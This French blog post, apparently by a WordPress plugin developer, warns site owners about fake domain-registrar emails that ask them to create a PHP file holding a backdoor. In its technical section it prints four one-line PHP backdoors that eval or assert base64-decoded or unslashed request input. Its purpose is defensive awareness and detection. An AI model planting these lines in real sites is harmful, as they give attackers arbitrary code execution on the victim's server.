Ne faites pas confiance à ces faux courriels de confirmation de domaine.
Si vous recevez un jour une lettre de quelque nature que ce soit vous demandant de créer, de télécharger ou d'installer du code PHP sur votre site Web, vous devez l'ignorer.
English version: Do not trust those fake domain confirmation emails
Récemment, certains de mes clients ont reçu d'étranges courriels de leurs bureaux d'enregistrement de noms de domaine. Ces courriels leur demandent de confirmer qu'ils sont bien propriétaires de leurs domaines. J'ai vérifié l'un de ces courriels et l'ai rapidement identifié comme une tentative d'escroquerie . Tous ces courriels suivent le même schéma et demandent la création d'un fichier PHP à la racine d'un site web, avec un nom et un contenu spécifiques. Bien entendu, le contenu suggéré pour ce fichier PHP contient un code malveillant, appelé porte dérobée. Ce type de code permet à un attaquant d'exécuter n'importe quelle action sur le site web de la victime.
Si vous recevez un courrier, quel qu'il soit, vous demandant de créer, télécharger ou installer du code PHP sur votre site web, ignorez-le sans hésiter. Même s'il provient du président ou de votre mère.
Les courriels frauduleux semblent légitimes grâce à une adresse d'expéditeur crédible. Il s'agit pourtant d'une usurpation d'identité. Vous ne vous attendez pas à recevoir un faux courriel de vos amis ou de votre registraire de domaine, n'est-ce pas ? Bien sûr que non ! N'importe quel courriel peut provenir de n'importe quelle adresse d'expéditeur. La grande majorité des serveurs et clients de messagerie ne vérifient pas l'adresse de l'expéditeur. Vous pourriez donc penser qu'il s'agit d'une tentative de piratage. Ne faites confiance à aucun courriel reçu d'un expéditeur connu si celui-ci vous demande d'effectuer une action suspecte, comme l'installation de code sur votre site web ou d'une application sur votre ordinateur.
Détails techniques
Les faux courriels contiennent généralement certaines des lignes PHP suivantes.
assert(stripslashes($_REQUEST['something']));
eval(stripslashes($_REQUEST['something']));
assert(base64_decode($_REQUEST['something']));
eval(base64_decode($_REQUEST['something']));
Pour info : base64_decode, eval et assert sont des marqueurs bien connus de code PHP suspect ou malveillant.
Voir aussi : Plugin Inspector révèle des problèmes de sécurité avec d’autres plugins